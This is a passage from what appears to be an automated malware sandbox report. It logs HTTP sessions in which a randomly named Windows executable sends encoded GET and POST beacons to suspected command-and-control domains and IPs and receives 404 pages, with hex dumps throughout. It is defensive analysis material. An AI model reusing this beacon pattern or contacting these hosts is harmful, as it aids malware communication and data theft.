                              Data Raw: 62 58 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 51 74 79 66 2f 61 45 61 4c 63 48 4e 38 4e 4e 2b 53 72 65 79 6b 6f 79 6d 34 4c 6f 4e 63 7a 64 4e 47 6d 65 30 43 37 66 74 31 78 47 38 75 76 4e 75 4f 7a 62 58 41 31 42 79 6c 77 57 78 67 48 75 59 44 78 33 39 2b 4d 78 41 4f 4f 59 43 45 71 74 34 47 2b 78 58 30 7a 65 77 78 51 43 78 50 44 6c 31 7a 4d 62 70 6a 64 2b 34 51 4e 31 6a 30 49 42 64 45 34 37 62 6a 39 36 37 6e 73 37 34 41 6b 33 6a 42 7a 62 79 7a 47 33 48 55 2f 77 6b 46 4a 38 45 58 39 51 31 66 6e 46 49 43 78 53 2b 76 55 75 69 39 51 74 52 6b 79 54 56 58 54 41 61 34 67 4e 6b 51 5a 74 6d 38 72 37 54 2f 61 4e 51 4f 6a 7a 30 4c 61 2b 32 6d 78 69 78 44 2b 35 30 75 76 70 4a 30 75 64 32 39 65 49 62 46 35 4d 78 58 56 6f 38 6c 37 78 6a 49 78 63 66 2b 74 42 74 57 68 6d 64 73 75 70 45 5a 6d 64 50 61 35 71 65 4f 77 73 74 75 34 37 35 33 63 48 65 30 68 74 79 6a 47 62 69 50 32 51 6f 42 62 56 67 41 46 68 52 45 65 65 33 62 6c 66 39 77 4e 45 42 31 55 59 36 6d 72 33 52 79 39 65 2f 78 59 7a 65 62 4e 32 52 76 43 48 59 39 6d 70 [TRUNCATED]
                              Data Ascii: bX= [TRUNCATED]
                              Sep 16, 2024 09:31:21.090826988 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:31:21 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: W/"66cd104a-b96"
                              Content-Encoding: gzip
                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                              Sep 16, 2024 09:31:21.090842962 CEST | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              24 | 192.168.2.5 | 58669 | 161.97.168.245 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:23.043401957 CEST | 465 | OUT | GET /wjff/?bX=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.qiluqiyuan.buzz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:31:23.649131060 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:31:23 GMT
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 2966
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: "66cd104a-b96"
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                              Sep 16, 2024 09:31:23.649144888 CEST | 224 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                              Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                              Sep 16, 2024 09:31:23.649156094 CEST | 1236 | IN | Data Raw: 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 65 6d 3b 0a 09 09 09 09 6c 69
                              Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                              Sep 16, 2024 09:31:23.649162054 CEST | 474 | IN | Data Raw: 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 61 6e 69 6d 61 74
                              Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oops! We couldn


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              25 | 192.168.2.5 | 58670 | 172.96.191.39 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:28.967771053 CEST | 730 | OUT | POST /3lkx/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.bola88site.one
                              Origin: http://www.bola88site.one
                              Referer: http://www.bola88site.one/3lkx/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 4b 64 39 47 63 59 61 4e 77 50 4d 6e 6d 30 62 6c 4a 73 73 69 7a 4c 5a 49 37 45 51 55 2b 79 32 71 73 41 6d 47 47 55 30 6f 47 47 2b 52 45 73 68 51 7a 6f 34 75 66 47 2f 73 4d 59 4b 2f 48 63 56 53 6f 67 6c 42 73 47 39 74 49 45 33 4c 77 71 61 2f 58 36 33 35 79 32 6b 67 38 2b 41 51 56 54 54 38 69 54 2b 4f 2f 73 77 73 33 33 34 34 79 44 78 78 70 42 67 61 66 62 42 66 4f 4f 2b 2b 32 4c 59 78 47 2b 6d 73 6c 36 71 51 36 49 44 72 66 4b 6b 4e 33 6c 49 5a 4d 76 38 4c 4b 61 48 66 48 49 71 68 6d 37 2b 49 78 6d 65 59 63 31 4d 51 62 53 2b 78 30 61 2b 66 51 34 30 79 4f 70 73 3d
                              Data Ascii: bX=cgJ0RJsNAcCJKd9GcYaNwPMnm0blJssizLZI7EQU+y2qsAmGGU0oGG+REshQzo4ufG/sMYK/HcVSoglBsG9tIE3Lwqa/X635y2kg8+AQVTT8iT+O/sws3344yDxxpBgafbBfOO++2LYxG+msl6qQ6IDrfKkN3lIZMv8LKaHfHIqhm7+IxmeYc1MQbS+x0a+fQ40yOps=
                              Sep 16, 2024 09:31:29.891184092 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:31:29 GMT
                              server: LiteSpeed
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              26 | 192.168.2.5 | 58671 | 172.96.191.39 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:32.303944111 CEST | 750 | OUT | POST /3lkx/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.bola88site.one
                              Origin: http://www.bola88site.one
                              Referer: http://www.bola88site.one/3lkx/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 43 71 74 69 2b 47 55 6d 63 6f 54 47 2b 52 50 4d 68 66 74 59 34 6c 66 47 79 4d 4d 5a 32 2f 48 63 52 53 6f 69 74 42 76 31 6c 73 49 55 33 56 38 4b 61 35 59 61 33 35 79 32 6b 67 38 2b 6b 75 56 58 2f 38 6a 69 75 4f 2b 4e 77 76 70 6e 34 37 37 6a 78 78 74 42 67 65 66 62 42 70 4f 4b 32 59 32 49 77 78 47 36 69 73 6c 72 71 66 30 49 44 70 42 36 6b 44 6e 6c 74 46 56 4a 6f 31 4f 5a 71 75 57 5a 48 46 71 74 54 69 72 45 57 77 50 56 67 6f 4c 42 32 47 6c 71 66 32 4b 62 6b 43 51 2b 34 4c 32 65 50 71 70 47 50 77 2f 64 32 59 66 6e 36 78 48 4c 58 77
                              Data Ascii: bX=cgJ0RJsNAcCJFZBGf/uN4PMmqUblGMsmzLVI7BwE+ACqti+GUmcoTG+RPMhftY4lfGyMMZ2/HcRSoitBv1lsIU3V8Ka5Ya35y2kg8+kuVX/8jiuO+Nwvpn477jxxtBgefbBpOK2Y2IwxG6islrqf0IDpB6kDnltFVJo1OZquWZHFqtTirEWwPVgoLB2Glqf2KbkCQ+4L2ePqpGPw/d2Yfn6xHLXw
                              Sep 16, 2024 09:31:33.234311104 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:31:33 GMT
                              server: LiteSpeed
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              27 | 192.168.2.5 | 58672 | 172.96.191.39 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:34.841780901 CEST | 1767 | OUT | POST /3lkx/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.bola88site.one
                              Origin: http://www.bola88site.one
                              Referer: http://www.bola88site.one/3lkx/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 36 71 73 52 32 47 47 78 41 6f 42 32 2b 52 43 73 68 63 74 59 34 6b 66 47 71 41 4d 5a 36 46 48 66 35 53 71 48 35 42 75 41 4a 73 44 55 33 56 30 71 61 38 58 36 32 6a 79 32 30 6b 38 2b 30 75 56 58 2f 38 6a 68 6d 4f 6f 73 77 76 72 6e 34 34 79 44 78 31 70 42 67 36 66 64 70 35 4f 4b 79 75 33 34 51 78 42 65 47 73 6e 5a 79 66 38 49 44 76 41 36 6c 46 6e 6c 52 73 56 4e 4a 47 4f 5a 75 49 57 61 6e 46 70 6f 32 43 79 55 58 6d 61 57 30 79 4a 67 43 38 6e 74 44 56 4d 34 34 36 56 35 70 78 36 62 33 66 75 69 75 38 33 4e 6e 57 4a 79 6d 6b 56 75 4f 6f 6d 47 51 67 31 31 30 4a 4c 59 38 4d 41 33 4b 77 4d 54 65 56 6e 71 6b 4f 35 72 59 66 30 42 64 41 67 74 57 4d 6e 66 59 49 6c 57 6f 6b 4a 6d 62 74 4f 33 67 79 58 79 64 67 43 72 7a 2b 31 72 46 39 45 77 76 47 6c 45 57 64 70 44 36 58 65 65 66 42 38 41 72 77 30 2f 6c 55 57 4a 44 73 79 63 58 63 45 31 4e 6e 71 4f 64 59 71 43 42 36 42 53 43 66 30 55 75 [TRUNCATED]
                              Data Ascii: bX=cgJ0RJsNAcCJFZBGf/uN4PMmqUblGMsmzLVI7BwE+A6qsR2GGxAoB2+RCshctY4kfGqAMZ6FHf5SqH5BuAJsDU3V0qa8X62jy20k8+0uVX/8jhmOoswvrn44yDx1pBg6fdp5OKyu34QxBeGsnZyf8IDvA6lFnlRsVNJGOZuIWanFpo2CyUXmaW0yJgC8ntDVM446V5px6b3fuiu83NnWJymkVuOomGQg110JLY8MA3KwMTeVnqkO5rYf0BdAgtWMnfYIlWokJmbtO3gyXydgCrz+1rF9EwvGlEWdpD6XeefB8Arw0/lUWJDsycXcE1NnqOdYqCB6BSCf0UuiX1O4FvFIbciGiRBgjTAmErpyGH83Y9FZMof5BIvV0QQR3cxN7pDBHVPuZRpp9f+RpL5I3OgVVP9zZvBE8n61cDkvFceI1cB4xHrhccPjCGVYUaYEjL8GMf8K35PiI/iBQxq04aPnmKScqUatmMxkqHSIFsVreYPxW3V76o8zxh8iPGxD0vj+vKUFL5C9qws2noIfKHsAnXLnjOLOzscuiAxjtO/oTi4tqLSyodxZi4BbicsjpXhd6NxHi87XE/ADKoXZZha/+gE6AgXuA+zG65HAvcPsRoG4zP9F46dW4TMiiuIEKCBvRUtW17tONy67uPOkLP0NPtWkKMYTrGAjVXrsZjytLTjOJ+5KaQpBL/7IL4w8sIzEg7LBya/JCFaEStYIVcMMRBt3sFbc9rm6P+8RJnMXBzvsJpOAWeOeQogaPglu5lACNkxaUsTQMR3xuWDbdNsTIzP2TSLM8Rq2MvzGQB6tqpbqpykn7s/mNGm27Kisl91T9ExzfCryf8zaJaSx7Qn9/DVVJUFxW4Q+BGXucMSUSvqeyBH5J/gGXT+sZCXlKFagPH8BkvmQCuiSdEH0qygpl+yFMamLWnmzaCOF3Aal0nJ+vGeXnqE7zUAbdaAqVYMRd40GQ07MxmD+ksRsD4S4SzUDQnFTfWu/qzGDV+iOmn1wF [TRUNCATED]
                              Sep 16, 2024 09:31:35.787333965 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:31:35 GMT
                              server: LiteSpeed
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              28 | 192.168.2.5 | 58673 | 172.96.191.39 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:37.389144897 CEST | 464 | OUT | GET /3lkx/?bX=RihUS+ZcBcWtP49fbKLPl8hUiWX9OeM0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4uYWL7+sOZXKma82UzwNxpRmep+gGd7K5Ptmsj9EAWiB5wAw==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.bola88site.one
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:31:38.353701115 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:31:38 GMT
                              server: LiteSpeed
